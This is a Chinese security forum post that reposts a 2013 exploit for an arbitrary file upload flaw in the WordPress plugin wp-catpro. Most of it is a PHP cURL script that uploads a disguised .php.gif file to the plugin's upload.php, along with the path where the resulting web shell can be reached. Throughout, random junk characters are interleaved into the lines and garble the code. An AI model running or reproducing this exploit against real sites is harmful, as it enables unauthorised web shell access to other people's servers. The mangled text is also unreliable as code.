找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2063|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability6 X! Z: d8 s& C( P! T5 k2 `$ x
#------------------------------------------------------------------------ i3 X: e, E% P0 o

9 ~, C, c. t2 U9 E* Y, _  x+ w作者  => Zikou-16
& h: W' D4 |( C$ X4 q: Z* z0 w邮箱 => zikou16x@gmail.com; W; W% w9 l3 K4 O1 Q( [
测试系统 : Windows 7 , Backtrack 5r32 Y( u5 c* W5 d" {' L3 a
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
) J7 s7 _. s2 T+ E8 K" A3 w####; ~/ }4 {; O! Y: p0 p0 X
5 U3 r2 L% g6 w: e7 ~& j* H+ [# D
#=> Exploit 信息:
/ v1 e# d7 s/ m$ B------------------& I  Q/ |6 X' U/ f& p: h5 |
# 攻击者可以上传 file/shell.php.gif
' ^% u- p' C+ C5 p0 c# ("jpg", "gif", "png")  // Allowed file extensions% w/ e* {; S. B3 Q) e
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# T: z+ e* J/ A! F( @% H# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
! J7 V5 Y! v" Q------------------6 t0 p; y  O/ Y  \" q0 |/ P  N

4 e+ N0 X. P- q# ^#=> Exploit- D& Z: f. `4 }
-----------
2 v# d6 z' n  \! q" H<?php
1 K9 u& }5 H& }3 L1 ?; L 5 S7 i" R5 c" g
$uploadfile="zik.php.gif";0 N) w2 ?3 u. S  v8 C
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");/ h( z3 Q4 P$ k. x' [! @
curl_setopt($ch, CURLOPT_POST, true);; k2 M8 N! E; b$ v/ e: f* W
curl_setopt($ch, CURLOPT_POSTFIELDS,
8 h9 Z5 t5 |# m) Earray('Filedata'=>"@$uploadfile",2 f/ L6 ?+ k7 F  n# Y- C
'folder'=>'/wp-content/uploads/catpro/'));1 A1 o+ q3 C: t6 K4 M% P! P" y
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
: Q' x, n+ c' V* K0 ^9 z! q5 s$postResult = curl_exec($ch);/ n! X  [9 N& {& G" W3 c. s" C
curl_close($ch);( V6 \$ j' ~5 k( ^

9 s+ d) U! u5 X( A8 v2 _& R$ Kprint "$postResult";/ L  \+ s8 b* x& [9 |

( @+ _4 L. ^& v7 k- t5 lShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif5 k: G- B, [4 M, c" N  [8 n
  ?>
9 \3 E2 L+ ^% A8 C<?php
! u9 E' m( r6 I3 @9 nphpinfo();
$ I% K9 M) e! K5 c?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表